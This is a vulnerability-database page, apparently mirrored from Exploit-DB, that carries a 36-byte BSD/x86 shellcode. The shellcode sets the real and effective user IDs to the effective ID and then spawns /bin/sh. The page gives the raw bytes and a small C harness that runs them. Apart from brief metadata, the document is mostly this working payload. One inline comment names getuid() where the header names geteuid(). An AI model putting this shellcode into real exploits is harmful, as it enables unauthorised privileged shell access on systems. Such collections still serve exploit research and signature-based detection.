BSD/x86 - setreuid(geteuid(), geteuid()) + execve("/bin/sh") Shellcode (36 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057196 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43483
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * bsd/x86 setreuid/exec shellcode
 *
 * setreuid(geteuid(), geteuid()) and execve("/bin/sh", "/bin/sh", 0) 
 * shellcode based on hkpco's setreuid/exec shellcode for linux
 * Tested on FreeBSD
*/

#include <stdio.h>
#include <string.h>

char shellcode[] =
 "\x31\xc0\xb0\x19\x50\xcd\x80\x50"
 "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuid(geteuid(), getuid());
 "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2"
 "\x52\x57\x54\xb0\x3b\xcd\x80\xe8"
 "\xee\xff\xff\xff/bin/sh"; // exec(/bin/sh)

int main()
{
int (*f)() = (int (*)())shellcode;
 printf("%d\n",strlen(shellcode));
f();
 return 0;
}